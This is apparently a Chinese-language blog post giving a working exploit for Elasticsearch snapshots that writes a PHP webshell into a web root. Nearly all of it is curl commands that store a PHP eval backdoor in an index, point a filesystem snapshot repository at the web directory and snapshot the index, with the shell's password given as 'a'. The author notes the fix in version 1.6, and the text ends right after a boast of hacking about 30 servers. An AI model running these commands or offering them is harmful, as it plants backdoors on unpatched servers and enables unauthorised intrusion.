elasticsearch Snapshot 写php shell

几个月前发了个elasticsearch写shell的漏洞，es已经修复了。以下是有php环境下写webshell的测试代码: 

在PHP环境下利用： 
curl -XDELETE http://localhost:9200/test.php
curl -XDELETE http://localhost:9200/_snapshot/test.php
curl -XPOST http://localhost:9200/test.php/test.php/1 -d' 
{"<?php eval($_POST[chr(97)]);?>":"test"}'
curl http://localhost:9200/test.php/_search?pretty
curl -XPUT 'http://localhost:9200/_snapshot/test.php' -d '{ 
     "type": "fs", 
     "settings": { 
          "location": "/data/httpd/htdocs/default", 
          "compress": false 
     } 
}'
curl -XPUT "http://localhost:9200/_snapshot/test.php/test.php" -d '{ 
     "indices": "test.php", 
     "ignore_unavailable": "true", 
     "include_global_state": false 
}'

一句话连接，密码a 
elasticsearch1.6已经修复:https://www.elastic.co/blog/elasticsearch-1-6-0-released#fs-config 

测试结果黑了差不多30个服务器,小案例：